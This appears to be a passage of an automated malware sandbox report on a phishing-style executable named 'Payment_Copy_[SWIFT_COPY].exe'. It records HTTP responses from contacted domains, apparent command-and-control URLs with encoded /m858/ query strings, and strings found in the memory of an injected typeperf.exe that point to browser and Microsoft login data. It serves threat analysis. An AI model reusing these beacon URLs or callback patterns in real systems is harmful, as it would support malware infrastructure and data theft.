            HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | content-type: text/html; charset=UTF-8 | expires: Wed, 11 Jan 1984 05:00:00 GMT | cache-control: no-cache, must-revalidate, max-age=0 | link: <https://fortunetravelsltd.com/wp-json/>; rel="https://api.w.org/" | transfer-encoding: chunked | content-encoding: br | vary: Accept-Encoding | date: Thu, 07 Dec 2023 12:42:43 GMT | server: LiteSpeed | referrer-policy: no-referrer-when-downgrade
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | content-type: text/html; charset=UTF-8 | expires: Wed, 11 Jan 1984 05:00:00 GMT | cache-control: no-cache, must-revalidate, max-age=0 | link: <https://fortunetravelsltd.com/wp-json/>; rel="https://api.w.org/" | transfer-encoding: chunked | content-encoding: br | vary: Accept-Encoding | date: Thu, 07 Dec 2023 12:42:48 GMT | server: LiteSpeed | referrer-policy: no-referrer-when-downgrade
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | content-type: text/html; charset=UTF-8 | expires: Wed, 11 Jan 1984 05:00:00 GMT | cache-control: no-cache, must-revalidate, max-age=0 | link: <https://fortunetravelsltd.com/wp-json/>; rel="https://api.w.org/" | transfer-encoding: chunked | content-encoding: br | vary: Accept-Encoding | date: Thu, 07 Dec 2023 12:42:51 GMT | server: LiteSpeed | referrer-policy: no-referrer-when-downgrade
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 07 Dec 2023 12:42:59 GMT | Server: Apache | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://porousworld.com/wp-json/>; rel="https://api.w.org/" | Upgrade: h2,h2c | Connection: Upgrade, close | Transfer-Encoding: chunked | Content-Type: text/html; charset=UTF-8
            Data Ascii: 3b<!DOCTYPE html><html lang="en-US"><head><meta charset="
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 07 Dec 2023 12:43:02 GMT | Server: Apache | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://porousworld.com/wp-json/>; rel="https://api.w.org/" | Upgrade: h2,h2c | Connection: Upgrade, close | Transfer-Encoding: chunked | Content-Type: text/html; charset=UTF-8
            Data Ascii: 16<!DOCTYPE html><html
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 07 Dec 2023 12:43:05 GMT | Server: Apache | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://porousworld.com/wp-json/>; rel="https://api.w.org/" | Upgrade: h2,h2c | Connection: Upgrade, close | Transfer-Encoding: chunked | Content-Type: text/html; charset=UTF-8
            Data Ascii: 3b<!DOCTYPE html><html lang="en-US"><head><meta charset="
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 07 Dec 2023 12:43:17 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html
            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 07 Dec 2023 12:43:19 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html
            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 07 Dec 2023 12:43:22 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html
            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 07 Dec 2023 12:43:25 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html; charset=utf-8
            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 07 Dec 2023 12:43:31 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 07 Dec 2023 12:43:34 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 07 Dec 2023 12:43:36 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 07 Dec 2023 12:43:39 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | expires: Wed, 11 Jan 1984 05:00:00 GMT | cache-control: no-cache, must-revalidate, max-age=0 | content-type: text/html; charset=UTF-8 | link: <https://sorenad.com/wp-json/>; rel="https://api.w.org/" | transfer-encoding: chunked | content-encoding: br | vary: Accept-Encoding | date: Thu, 07 Dec 2023 12:43:57 GMT | server: LiteSpeed
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | expires: Wed, 11 Jan 1984 05:00:00 GMT | cache-control: no-cache, must-revalidate, max-age=0 | content-type: text/html; charset=UTF-8 | link: <https://sorenad.com/wp-json/>; rel="https://api.w.org/" | transfer-encoding: chunked | content-encoding: br | vary: Accept-Encoding | date: Thu, 07 Dec 2023 12:44:00 GMT | server: LiteSpeed
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://sorenad.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 07 Dec 2023 12:44:03 GMTserver: LiteSpeedData Raw: 31 36 36 31 0d 0a b0 d8 25 8a 6a d6 0f 89 a8 26 f5 00 68 a4 2c 9c bf 3f 42 86 b9 ff 54 2d bf b6 66 5c f4 cf d0 dc 68 b5 06 48 00 0c 22 b1 b7 72 fa b1 72 0c 3b 20 09 91 d8 05 09 1a 00 15 4e a3 9f 72 53 85 14 9b 5a f2 fd bd d3 aa 9c 2a 05 f9 1b 76 a9 69 76 06 21 90 d4 8d 4c b3 ce 9e 73 11 f5 11 5f 12 33 88 cf 61 5a dd 33 be 4b 86 80 aa 0b 22 e3 91 b4 86 63 ba cf d9 24 7a 4f 64 17 24 f7 d7 5e cd e1 29 80 84 81 0c af 0d a6 0f 0f 2b e8 6d 01 5f fe 02 92 6d a0 92 22 fb 74 a5 cb b1 67 e2 b6 fb de ee 5f fd 7f a5 35 d9 69 57 7a 47 29 9d e0 2b a5 f2 83 21 40 63 a4 09 3a 98 00 96 c7 70 be 53 42 40 8c 87 db 96 31 2d ef e7 e8 29 23 44 cc 86 62 4d 0a 01 ed d6 b3 c7 5d e8 0d 0c 53 69 d6 05 23 ef d2 8d 24 5f 7e 23 b6 e7 12 74 30 6a fd 9a 6c 15 0c 36 c0 f0 a8 9e 8b 80 f3 5f 2e df 3b ff e9 f2 1d 38 ff e2 fc 87 0e c6 06 67 46 c9 84 fe 3e ba d0 9b 1b a8 3b e9 bc 0a b7 ff 2e 1f 5e 9b 84 b0 46 15 5a fc 4d 7b e8 36 6e c3 61 f8 27 f9 13 44 7c 2d 8d ba 65 11 45 a5 f7 6f ec 93 3f 87 57 f9 58 b8 79 be 4a 5e 7a 79 45 f6 c1 40 8e a3 51 a4 b7 95 36 8a ec 54 45 e4 38 12 1f 64 98 3c a9 a4 23 3e 1c 8c c2 74 13 19 3d 3c 80 53 e6 16 8d 7a 68 2b 59 3f b4 40 cf cf 5b a7 06 d9 4c 81 80 13 b0 ef 8d 1b eb 68 ec 46 f0 15 49 13 94 1b 64 50 eb 28 bf 9e c9 46 a9 a6 7f 49 4d dd a8 9e 7b bf f1 e6 9b c0 45 a2 30 48 b7 09 30 4c 2d 74 2f 5b 15 ef c9 eb 40 fd 29 17 99 dd 48 84 78 1f e3 69 34 56 36 3e e6 94 27 31 63 71 6f 07 1b 8d 43 bb a0 c8 64 da 79 b0 53 dd 11 30 5c 81 d6 da f8 58 36 9e ec c6 14 f4 a9 b1 2d 11 45 c3 ed 16 ce 56 36 f8 85 72 c7 5b 0c 76 0a 0a d4 60 e8 f6 af f1 02 e2 f5 6c f6 4c 1f 09 ea 98 
50 5e 63 af 83 02 ed c1 8e 41 f7 fa 89 6a 60 a7 43 37 12 98 5b 79 df 4a 1f e0 cd cf bf 0a 3d 07 b6 85 2d 67 51 06 04 e4 d1 fb 60 a5 0f 9b 96 d6 35 a3 53 de c7 c1 8f d7 c7 5e d9 18 08 59 cf 3a 2a d5 d3 fc 8c c6 d6 d2 78 56 c3 46 de 7d f9 0d 04 31 08 28 51 3d 58 24 42 33 54 64 da 27 a1 7d df 5d 05 b7 07 cd aa 9a 9a e6 f9 7b 6f 07 9f 02 32 68 43 7c dd a9 5e 92 2e 14 7a a1 f5 11 bd 18 b3 e9 f6 01 09 93 85 60 2d 22 eb 5a 84 d1 8b a1 af 9f f8 f0 88 5e 0c 87 51 21 81 de 55 d5 9b 3a 28 84 d1 8b ba 81 55 4d dd 9f ff 00 6b b1 20 8c 26 67 02 a6 10 46 91 8c 12 91 ab c3 a8 51 9b a3 d3 76 40 02 9d 7f 7d fe e5 e5 5b 4f 7f 74 fe f7 f9 17 e7 5f 43 8f 1d 47 f3 e7 f3 2f 2e df 81 cf 7e 75 f9 d6 d3 1f 7d f6 ab a7 3f 02 02 1d a1 1c cd 9f cf bf 78 fa a3 f3 5f e1 f2 9d f3 df ce bf 84 f3 2f 2e ff 0f 76 6d ce 7f bd 7c 07 08 5c fe 7f fe c5 e5 ff 70 fe f1 e5 ff 08 23 87 3e da e2 18 27 d9 fb 86 f7 44 bc 79 74 c2 c8 73 27 5f aa 39 55 85 24 ba cd e4 6f 36 c3 28 48 d7 aa 40 83 4b 71 33 9f 1f 82 3b bc 66 f5 10 64 b4 5a de 52 fd 68 64 50 b2 ea f6 82 bf 3d
            Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Thu, 07 Dec 2023 12:44:27 GMT
              Server: Apache
              Content-Length: 315
              Connection: close
              Content-Type: text/html; charset=iso-8859-1
              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Thu, 07 Dec 2023 12:44:30 GMT
              Server: Apache
              Content-Length: 315
              Connection: close
              Content-Type: text/html; charset=iso-8859-1
              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Thu, 07 Dec 2023 12:44:32 GMT
              Server: Apache
              Content-Length: 315
              Connection: close
              Content-Type: text/html; charset=iso-8859-1
              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Thu, 07 Dec 2023 12:44:35 GMT
              Server: Apache
              Content-Length: 315
              Connection: close
              Content-Type: text/html; charset=iso-8859-1
              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Server: nginx/1.20.1
              Date: Thu, 07 Dec 2023 12:44:41 GMT
              Content-Type: text/html
              Content-Length: 3650
              Connection: close
              ETag: "636d2d22-e42"
            Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Server: nginx/1.20.1
              Date: Thu, 07 Dec 2023 12:44:43 GMT
              Content-Type: text/html
              Content-Length: 3650
              Connection: close
              ETag: "636d2d22-e42"
            Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Server: nginx/1.20.1
              Date: Thu, 07 Dec 2023 12:44:46 GMT
              Content-Type: text/html
              Content-Length: 3650
              Connection: close
              ETag: "636d2d22-e42"
            Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Server: nginx/1.20.1
              Date: Thu, 07 Dec 2023 12:44:49 GMT
              Content-Type: text/html
              Content-Length: 3650
              Connection: close
              ETag: "636d2d22-e42"
            Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Thu, 07 Dec 2023 12:44:52 GMT
              Server: Apache
              X-Powered-By: PHP/7.4.33
              Expires: Wed, 11 Jan 1984 05:00:00 GMT
              Cache-Control: no-cache, must-revalidate, max-age=0
              Link: <http://blessingstation.org/wp-json/>; rel="https://api.w.org/"
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Encoding: br
              Content-Length: 14735
              Content-Type: text/html; charset=UTF-8
            Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Thu, 07 Dec 2023 12:44:55 GMT
              Server: Apache
              X-Powered-By: PHP/7.4.33
              Expires: Wed, 11 Jan 1984 05:00:00 GMT
              Cache-Control: no-cache, must-revalidate, max-age=0
              Link: <http://blessingstation.org/wp-json/>; rel="https://api.w.org/"
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Encoding: br
              Content-Length: 14735
              Content-Type: text/html; charset=UTF-8
            Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Thu, 07 Dec 2023 12:44:57 GMT
              Server: Apache
              X-Powered-By: PHP/7.4.33
              Expires: Wed, 11 Jan 1984 05:00:00 GMT
              Cache-Control: no-cache, must-revalidate, max-age=0
              Link: <http://blessingstation.org/wp-json/>; rel="https://api.w.org/"
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Encoding: br
              Content-Length: 14735
              Content-Type: text/html; charset=UTF-8
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Thu, 07 Dec 2023 12:45:44 GMT
            Server: Apache
            Content-Length: 315
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Thu, 07 Dec 2023 12:45:47 GMT
            Server: Apache
            Content-Length: 315
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Thu, 07 Dec 2023 12:45:50 GMT
            Server: Apache
            Content-Length: 315
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Thu, 07 Dec 2023 12:45:52 GMT
            Server: Apache
            Content-Length: 315
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: typeperf.exe, 00000006.00000002.3840171693.000000000469A000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.0000000003CAA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://blessingstation.org/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=YaKeKM0UqinIxXqyt1dkMasU/gJKxJDaurUM7ZyBp
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
            Source: typeperf.exe, 00000006.00000002.3840171693.0000000004508000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.0000000003B18000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://fedoraproject.org/
            Source: typeperf.exe, 00000006.00000002.3840171693.0000000003878000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.0000000002E88000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://fortunetravelsltd.com/m858/?nRRpS=ZTmxX8apPfF8tkROuhCldKUdm000Pni379NFYx1SML9Ouafr/VkVuzz6gSx
            Source: typeperf.exe, 00000006.00000002.3840171693.00000000049BE000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 00000006.00000002.3842144841.00000000058C0000.00000004.00000800.00020000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.0000000003FCE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://hillcresthealth.online/?ts=fE1vYmlsZUNsZWFuQmxhY2t8fDQ3OWMwfGJ1Y2tldDAwM3x8fHx8fDY1NzFiZTZiYj
            Source: typeperf.exe, 00000006.00000002.3840171693.00000000041E4000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.00000000037F4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://img.sedoparking.com
            Source: typeperf.exe, 00000006.00000002.3840171693.0000000004508000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.0000000003B18000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://nginx.net/
            Source: Payment_Copy_[SWIFT_COPY].exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: Payment_Copy_[SWIFT_COPY].exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
            Source: typeperf.exe, 00000006.00000002.3840171693.0000000003A0A000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://porousworld.com/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=xSDcG6j
            Source: typeperf.exe, 00000006.00000002.3840171693.0000000004052000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.0000000003662000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://sorenad.com/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=BJQpRkiFIWGAbNjUP1SoKh8XQLkPvbdX4RB0SOc4uF4dZoLmD
            Source: mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3841079742.0000000004CC6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.633922.com
            Source: mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3841079742.0000000004CC6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.633922.com/m858/
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
            Source: typeperf.exe, 00000006.00000003.1713297774.0000000007317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: typeperf.exe, 00000006.00000002.3840171693.00000000049BE000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 00000006.00000002.3842144841.00000000058C0000.00000004.00000800.00020000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.0000000003FCE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdf
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 00000006.00000003.1766828555.0000000007A0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
            Source: typeperf.exe, 00000006.00000003.1713297774.0000000007317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: typeperf.exe, 00000006.00000003.1713297774.0000000007317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: typeperf.exe, 00000006.00000003.1713297774.0000000007317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 00000006.00000003.1766828555.0000000007A0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
            Source: typeperf.exe, 00000006.00000002.3840171693.00000000049BE000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 00000006.00000002.3842144841.00000000058C0000.00000004.00000800.00020000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.0000000003FCE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd
            Source: typeperf.exe, 00000006.00000003.1713297774.0000000007317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: typeperf.exe, 00000006.00000003.1713297774.0000000007317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: typeperf.exe, 00000006.00000003.1713297774.0000000007317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: typeperf.exe, 00000006.00000002.3840171693.0000000003D2E000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.000000000333E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 00000006.00000003.1766828555.0000000007A0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 00000006.00000003.1766828555.0000000007A0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
            Source: typeperf.exe, 00000006.00000002.3838152195.0000000000897000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: typeperf.exe, 00000006.00000002.3838152195.0000000000897000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: typeperf.exe, 00000006.00000003.1710170372.00000000072E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: typeperf.exe, 00000006.00000002.3838152195.0000000000897000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: typeperf.exe, 00000006.00000002.3838152195.0000000000897000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10333
            Source: typeperf.exe, 00000006.00000002.3838152195.0000000000897000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
